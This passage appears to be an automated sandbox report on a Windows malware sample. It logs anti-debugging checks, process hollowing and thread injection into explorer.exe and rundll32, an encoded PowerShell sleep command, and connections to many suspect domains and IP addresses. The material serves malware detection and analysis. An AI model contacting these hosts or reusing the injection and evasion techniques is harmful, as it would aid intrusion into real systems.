                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043E9080 mov eax, dword ptr fs:[00000030h]7_2_043E9080
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04463884 mov eax, dword ptr fs:[00000030h]7_2_04463884
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04463884 mov eax, dword ptr fs:[00000030h]7_2_04463884
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044290AF mov eax, dword ptr fs:[00000030h]7_2_044290AF
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0441F0BF mov ecx, dword ptr fs:[00000030h]7_2_0441F0BF
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0441F0BF mov eax, dword ptr fs:[00000030h]7_2_0441F0BF
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0441F0BF mov eax, dword ptr fs:[00000030h]7_2_0441F0BF
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04423D43 mov eax, dword ptr fs:[00000030h]7_2_04423D43
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0440B944 mov eax, dword ptr fs:[00000030h]7_2_0440B944
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0440B944 mov eax, dword ptr fs:[00000030h]7_2_0440B944
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04463540 mov eax, dword ptr fs:[00000030h]7_2_04463540
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043F3D34 mov eax, dword ptr fs:[00000030h]7_2_043F3D34
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043F3D34 mov eax, dword ptr fs:[00000030h]7_2_043F3D34
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043F3D34 mov eax, dword ptr fs:[00000030h]7_2_043F3D34
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043F3D34 mov eax, dword ptr fs:[00000030h]7_2_043F3D34
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043F3D34 mov eax, dword ptr fs:[00000030h]7_2_043F3D34
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043F3D34 mov eax, dword ptr fs:[00000030h]7_2_043F3D34
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043F3D34 mov eax, dword ptr fs:[00000030h]7_2_043F3D34
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043F3D34 mov eax, dword ptr fs:[00000030h]7_2_043F3D34
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043F3D34 mov eax, dword ptr fs:[00000030h]7_2_043F3D34
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043F3D34 mov eax, dword ptr fs:[00000030h]7_2_043F3D34
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043F3D34 mov eax, dword ptr fs:[00000030h]7_2_043F3D34
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043F3D34 mov eax, dword ptr fs:[00000030h]7_2_043F3D34
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043F3D34 mov eax, dword ptr fs:[00000030h]7_2_043F3D34
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043EAD30 mov eax, dword ptr fs:[00000030h]7_2_043EAD30
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04407D50 mov eax, dword ptr fs:[00000030h]7_2_04407D50
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0440C577 mov eax, dword ptr fs:[00000030h]7_2_0440C577
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0440C577 mov eax, dword ptr fs:[00000030h]7_2_0440C577
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043E9100 mov eax, dword ptr fs:[00000030h]7_2_043E9100
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043E9100 mov eax, dword ptr fs:[00000030h]7_2_043E9100
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043E9100 mov eax, dword ptr fs:[00000030h]7_2_043E9100
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043EB171 mov eax, dword ptr fs:[00000030h]7_2_043EB171
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043EB171 mov eax, dword ptr fs:[00000030h]7_2_043EB171
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043EC962 mov eax, dword ptr fs:[00000030h]7_2_043EC962
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04404120 mov eax, dword ptr fs:[00000030h]7_2_04404120
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04404120 mov eax, dword ptr fs:[00000030h]7_2_04404120
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04404120 mov eax, dword ptr fs:[00000030h]7_2_04404120
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04404120 mov eax, dword ptr fs:[00000030h]7_2_04404120
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04404120 mov ecx, dword ptr fs:[00000030h]7_2_04404120
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0446A537 mov eax, dword ptr fs:[00000030h]7_2_0446A537
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04414D3B mov eax, dword ptr fs:[00000030h]7_2_04414D3B
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04414D3B mov eax, dword ptr fs:[00000030h]7_2_04414D3B
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04414D3B mov eax, dword ptr fs:[00000030h]7_2_04414D3B
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0441513A mov eax, dword ptr fs:[00000030h]7_2_0441513A
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0441513A mov eax, dword ptr fs:[00000030h]7_2_0441513A
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044B8D34 mov eax, dword ptr fs:[00000030h]7_2_044B8D34
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044741E8 mov eax, dword ptr fs:[00000030h]7_2_044741E8
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043E2D8A mov eax, dword ptr fs:[00000030h]7_2_043E2D8A
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043E2D8A mov eax, dword ptr fs:[00000030h]7_2_043E2D8A
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043E2D8A mov eax, dword ptr fs:[00000030h]7_2_043E2D8A
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043E2D8A mov eax, dword ptr fs:[00000030h]7_2_043E2D8A
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043E2D8A mov eax, dword ptr fs:[00000030h]7_2_043E2D8A
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04498DF1 mov eax, dword ptr fs:[00000030h]7_2_04498DF1
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0440C182 mov eax, dword ptr fs:[00000030h]7_2_0440C182
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0441A185 mov eax, dword ptr fs:[00000030h]7_2_0441A185
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0441FD9B mov eax, dword ptr fs:[00000030h]7_2_0441FD9B
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0441FD9B mov eax, dword ptr fs:[00000030h]7_2_0441FD9B
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043EB1E1 mov eax, dword ptr fs:[00000030h]7_2_043EB1E1
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043EB1E1 mov eax, dword ptr fs:[00000030h]7_2_043EB1E1
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043EB1E1 mov eax, dword ptr fs:[00000030h]7_2_043EB1E1
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043FD5E0 mov eax, dword ptr fs:[00000030h]7_2_043FD5E0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043FD5E0 mov eax, dword ptr fs:[00000030h]7_2_043FD5E0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044135A1 mov eax, dword ptr fs:[00000030h]7_2_044135A1
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044669A6 mov eax, dword ptr fs:[00000030h]7_2_044669A6
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044161A0 mov eax, dword ptr fs:[00000030h]7_2_044161A0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044161A0 mov eax, dword ptr fs:[00000030h]7_2_044161A0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04411DB5 mov eax, dword ptr fs:[00000030h]7_2_04411DB5
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04411DB5 mov eax, dword ptr fs:[00000030h]7_2_04411DB5
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04411DB5 mov eax, dword ptr fs:[00000030h]7_2_04411DB5
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04474257 mov eax, dword ptr fs:[00000030h]7_2_04474257
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043EE620 mov eax, dword ptr fs:[00000030h]7_2_043EE620
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043EAA16 mov eax, dword ptr fs:[00000030h]7_2_043EAA16
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043EAA16 mov eax, dword ptr fs:[00000030h]7_2_043EAA16
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0449B260 mov eax, dword ptr fs:[00000030h]7_2_0449B260
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0449B260 mov eax, dword ptr fs:[00000030h]7_2_0449B260
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044B8A62 mov eax, dword ptr fs:[00000030h]7_2_044B8A62
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0440AE73 mov eax, dword ptr fs:[00000030h]7_2_0440AE73
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0440AE73 mov eax, dword ptr fs:[00000030h]7_2_0440AE73
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0440AE73 mov eax, dword ptr fs:[00000030h]7_2_0440AE73
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0440AE73 mov eax, dword ptr fs:[00000030h]7_2_0440AE73
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0440AE73 mov eax, dword ptr fs:[00000030h]7_2_0440AE73
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043F8A0A mov eax, dword ptr fs:[00000030h]7_2_043F8A0A
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0442927A mov eax, dword ptr fs:[00000030h]7_2_0442927A
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043EC600 mov eax, dword ptr fs:[00000030h]7_2_043EC600
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043EC600 mov eax, dword ptr fs:[00000030h]7_2_043EC600
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043EC600 mov eax, dword ptr fs:[00000030h]7_2_043EC600
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04418E00 mov eax, dword ptr fs:[00000030h]7_2_04418E00
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043F766D mov eax, dword ptr fs:[00000030h]7_2_043F766D
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04403A1C mov eax, dword ptr fs:[00000030h]7_2_04403A1C
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0441A61C mov eax, dword ptr fs:[00000030h]7_2_0441A61C
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0441A61C mov eax, dword ptr fs:[00000030h]7_2_0441A61C
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0449FE3F mov eax, dword ptr fs:[00000030h]7_2_0449FE3F
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043E9240 mov eax, dword ptr fs:[00000030h]7_2_043E9240
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043E9240 mov eax, dword ptr fs:[00000030h]7_2_043E9240
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043E9240 mov eax, dword ptr fs:[00000030h]7_2_043E9240
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043E9240 mov eax, dword ptr fs:[00000030h]7_2_043E9240
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043F7E41 mov eax, dword ptr fs:[00000030h]7_2_043F7E41
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043F7E41 mov eax, dword ptr fs:[00000030h]7_2_043F7E41
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043F7E41 mov eax, dword ptr fs:[00000030h]7_2_043F7E41
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043F7E41 mov eax, dword ptr fs:[00000030h]7_2_043F7E41
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043F7E41 mov eax, dword ptr fs:[00000030h]7_2_043F7E41
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043F7E41 mov eax, dword ptr fs:[00000030h]7_2_043F7E41
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04428EC7 mov eax, dword ptr fs:[00000030h]7_2_04428EC7
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0449FEC0 mov eax, dword ptr fs:[00000030h]7_2_0449FEC0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04412ACB mov eax, dword ptr fs:[00000030h]7_2_04412ACB
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044136CC mov eax, dword ptr fs:[00000030h]7_2_044136CC
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043FAAB0 mov eax, dword ptr fs:[00000030h]7_2_043FAAB0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043FAAB0 mov eax, dword ptr fs:[00000030h]7_2_043FAAB0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043E52A5 mov eax, dword ptr fs:[00000030h]7_2_043E52A5
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043E52A5 mov eax, dword ptr fs:[00000030h]7_2_043E52A5
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043E52A5 mov eax, dword ptr fs:[00000030h]7_2_043E52A5
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043E52A5 mov eax, dword ptr fs:[00000030h]7_2_043E52A5
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043E52A5 mov eax, dword ptr fs:[00000030h]7_2_043E52A5
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044B8ED6 mov eax, dword ptr fs:[00000030h]7_2_044B8ED6
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044116E0 mov ecx, dword ptr fs:[00000030h]7_2_044116E0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04412AE4 mov eax, dword ptr fs:[00000030h]7_2_04412AE4
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0447FE87 mov eax, dword ptr fs:[00000030h]7_2_0447FE87
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0441D294 mov eax, dword ptr fs:[00000030h]7_2_0441D294
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0441D294 mov eax, dword ptr fs:[00000030h]7_2_0441D294
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043F76E2 mov eax, dword ptr fs:[00000030h]7_2_043F76E2
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044646A7 mov eax, dword ptr fs:[00000030h]7_2_044646A7
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044B0EA5 mov eax, dword ptr fs:[00000030h]7_2_044B0EA5
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044B0EA5 mov eax, dword ptr fs:[00000030h]7_2_044B0EA5
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044B0EA5 mov eax, dword ptr fs:[00000030h]7_2_044B0EA5
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0441FAB0 mov eax, dword ptr fs:[00000030h]7_2_0441FAB0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043E4F2E mov eax, dword ptr fs:[00000030h]7_2_043E4F2E
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043E4F2E mov eax, dword ptr fs:[00000030h]7_2_043E4F2E
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044B8B58 mov eax, dword ptr fs:[00000030h]7_2_044B8B58
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044B8F6A mov eax, dword ptr fs:[00000030h]7_2_044B8F6A
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04413B7A mov eax, dword ptr fs:[00000030h]7_2_04413B7A
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04413B7A mov eax, dword ptr fs:[00000030h]7_2_04413B7A
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044B070D mov eax, dword ptr fs:[00000030h]7_2_044B070D
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044B070D mov eax, dword ptr fs:[00000030h]7_2_044B070D
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0441A70E mov eax, dword ptr fs:[00000030h]7_2_0441A70E
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0441A70E mov eax, dword ptr fs:[00000030h]7_2_0441A70E
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044A131B mov eax, dword ptr fs:[00000030h]7_2_044A131B
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0440F716 mov eax, dword ptr fs:[00000030h]7_2_0440F716
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0447FF10 mov eax, dword ptr fs:[00000030h]7_2_0447FF10
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0447FF10 mov eax, dword ptr fs:[00000030h]7_2_0447FF10
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043EDB60 mov ecx, dword ptr fs:[00000030h]7_2_043EDB60
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043FFF60 mov eax, dword ptr fs:[00000030h]7_2_043FFF60
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043EF358 mov eax, dword ptr fs:[00000030h]7_2_043EF358
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0441E730 mov eax, dword ptr fs:[00000030h]7_2_0441E730
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043EDB40 mov eax, dword ptr fs:[00000030h]7_2_043EDB40
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043FEF40 mov eax, dword ptr fs:[00000030h]7_2_043FEF40
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044103E2 mov eax, dword ptr fs:[00000030h]7_2_044103E2
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044103E2 mov eax, dword ptr fs:[00000030h]7_2_044103E2
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044103E2 mov eax, dword ptr fs:[00000030h]7_2_044103E2
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044103E2 mov eax, dword ptr fs:[00000030h]7_2_044103E2
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044103E2 mov eax, dword ptr fs:[00000030h]7_2_044103E2
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044103E2 mov eax, dword ptr fs:[00000030h]7_2_044103E2
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043F8794 mov eax, dword ptr fs:[00000030h]7_2_043F8794
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043F1B8F mov eax, dword ptr fs:[00000030h]7_2_043F1B8F
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043F1B8F mov eax, dword ptr fs:[00000030h]7_2_043F1B8F
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044237F5 mov eax, dword ptr fs:[00000030h]7_2_044237F5
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044A138A mov eax, dword ptr fs:[00000030h]7_2_044A138A
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0449D380 mov ecx, dword ptr fs:[00000030h]7_2_0449D380
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0441B390 mov eax, dword ptr fs:[00000030h]7_2_0441B390
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04467794 mov eax, dword ptr fs:[00000030h]7_2_04467794
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04467794 mov eax, dword ptr fs:[00000030h]7_2_04467794
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04467794 mov eax, dword ptr fs:[00000030h]7_2_04467794
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_044B5BA5 mov eax, dword ptr fs:[00000030h]7_2_044B5BA5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_010E9910
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\explorer.exeDomain query: www.elite-travel-cn.com
                Source: C:\Windows\explorer.exeNetwork Connect: 107.149.40.247 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 88.99.217.197 80Jump to behavior
                Source: C:\Windows\explorer.exeDomain query: www.3658622bet.com
                Source: C:\Windows\explorer.exeNetwork Connect: 166.88.175.130 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 162.254.33.214 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 64.64.253.213 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 146.148.102.201 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 185.224.170.82 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 64.225.91.73 80Jump to behavior
                Source: C:\Windows\explorer.exeDomain query: www.realtxt.co.uk
                Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.hiufouwnwk.shop
                Source: C:\Windows\explorer.exeNetwork Connect: 192.46.208.151 80Jump to behavior
                Source: C:\Windows\explorer.exeDomain query: www.newhard.ru
                Source: C:\Windows\explorer.exeDomain query: www.adelaidesociety.com
                Source: C:\Windows\explorer.exeDomain query: www.cobramierer.com
                Source: C:\Windows\explorer.exeDomain query: www.forumhtc.com
                Source: C:\Windows\explorer.exeDomain query: www.4tx.ru
                Source: C:\Windows\explorer.exeDomain query: www.scastive.online
                Source: C:\Windows\explorer.exeNetwork Connect: 35.213.254.232 80Jump to behavior
                Source: C:\Windows\explorer.exeDomain query: www.dubmoviedaaa.com
                Source: C:\Windows\explorer.exeDomain query: www.glb-mobility.com
                Source: C:\Windows\explorer.exeNetwork Connect: 176.28.33.25 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 35.77.200.33 80Jump to behavior
                Source: C:\Windows\explorer.exeDomain query: www.060jinbo.com
                Source: C:\Windows\explorer.exeNetwork Connect: 185.253.34.81 80Jump to behavior
                Source: C:\Windows\explorer.exeDomain query: www.byfuture.biz
                Source: C:\Windows\explorer.exeDomain query: www.loaddown.vip
                Source: C:\Windows\explorer.exeDomain query: www.bip39chain.info
                Source: C:\Windows\explorer.exeNetwork Connect: 141.8.195.124 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 194.58.112.174 80Jump to behavior
                Sample uses process hollowing technique
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 150000Jump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                Encrypted powershell cmdline option found
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess created: Base64 decoded start-sleep -seconds 20
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess created: Base64 decoded start-sleep -seconds 20Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread register set: target process: 3528Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 3528Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe purecrypter.exeJump to behavior
                Source: explorer.exe, 00000004.00000000.458059249.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.436410689.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.392856308.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Managerzx
                Source: explorer.exe, 00000004.00000000.468781735.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.458059249.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.441631384.0000000005C70000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000004.00000000.458059249.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.436410689.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.392856308.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 00000004.00000000.435771089.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.457369140.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.392106611.00000000009C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanath
                Source: explorer.exe, 00000004.00000000.458059249.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.436410689.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.392856308.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
